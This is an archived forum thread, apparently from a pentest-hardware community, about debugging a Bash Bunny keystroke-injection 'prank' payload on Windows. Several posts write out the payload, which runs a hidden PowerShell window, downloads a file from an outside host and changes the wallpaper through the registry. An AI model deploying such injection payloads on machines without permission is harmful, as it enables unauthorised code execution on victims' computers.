Dragus Posted February 13, 2019 Posted February 13, 2019 Hello everyone, I've been fiddling with multiple payloads for a while on multiple computers. I've seen various results (depending on the PC) and got very close (I think) to make a few of the payloads work properly after changing their configuration. One I'd like to get working for a starter is the Wallpaper Changer of Doom . It's not related to that specific payload, but on the Windows 7 computer, it opens the command prompt (with "CMD" in it) and nothing happens. The first time I plugged it in, it installed a driver (from Windows) for a few minutes. I think it's an issue related to Quack (typing characters), here's what I got so far: LED SETUP ATTACKMODE HID LED ATTACK Q GUI r Q DELAY 1000 Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}"" Q ENTER It seems to be blinking yellow from that point. Any idea how I could debug this?
PoSHMagiC0de Posted February 13, 2019 Posted February 13, 2019 Hmm, on your computer when you hit "windows key + r" what happens? If nothing, you have a keyboard like mine that can disable the windows key and that also stops the BB GUI command. If not, try opening notepad and set a payload to just type string to see if anything is coming across at all.
Dragus Posted February 13, 2019 Author Posted February 13, 2019 I tried it, Windows + R opens the command prompt with "cmd" written in it. It's the same thing I see when executing the payload, but after that, no text is written. I'll try a payload to only write text and see from there (it'll take a while so I learn the basics furthermore), it's a good idea since it would isolate the issue. Thanks for the reply!
Dragus Posted February 14, 2019 Author Posted February 14, 2019 Here's a follow-up! I think there's a typo on the YouTube video or Github, not sure from where yet. There was an unescaped quote at the end of the line. This works "better": LED SETUP ATTACKMODE HID LED ATTACK Q GUI r Q DELAY 1000 Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}\"" Q ENTER Now the result is that I see Powershell open up and close right away. I'm not sure if it's the normal behavior since there are many variations of this prank script. (if someone knows, enlight me) Also, that's me being slightly lazy, but in this script's context, what would the variable $home typically point to? I wanna debug further and try to find the image. Finally, do you think that the image fetching follows the URL (there are redirections)? Or it fails because the first answer wasn't HTTP 200? Thank you for any ideas, I'm happy I progressed!
Dave-ee Jones Posted February 14, 2019 Posted February 14, 2019 @Dragus You can try adding a pause at the end of your Powershell command. This will keep the Powershell window open until you press Enter so you can see errors and the like. Very useful. $home points to your current Users home directory. E.g. if your name is 'User' then it will go to: C:\Users\User Not sure about $p. Old me might've known..
Dragus Posted February 15, 2019 Author Posted February 15, 2019 `Thanks! That helped me find the reason for my next problem. Here is what it really writes in the command prompt: powershell -w h `$p=$home+`<z.jpg`;iwr https:ééwww.magikweb.caéz.jpg -O $p;SP `HKCU:Control Panel<Desktop`WallPaper $p;1..29>%^RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1¨pause That's really messy. It seems like it's assuming I have a US English keyboard. Is that a common issue? I would think a lot of non-US countries' users would have a similar issue.
Dragus Posted February 15, 2019 Author Posted February 15, 2019 I forgot to add context in my last post. I thought about using DUCKY_LANG, but my keyboard (and most people here) does not follow 2-letter country codes. Here's one of mine (the one I use the most): https://prnt.sc/ml9yya Is there a way for the Bash Bunny to automatically adapt to the target's environment? (the windows' current keyboard)
Recommended Posts
Archived
This topic is now archived and is closed to further replies.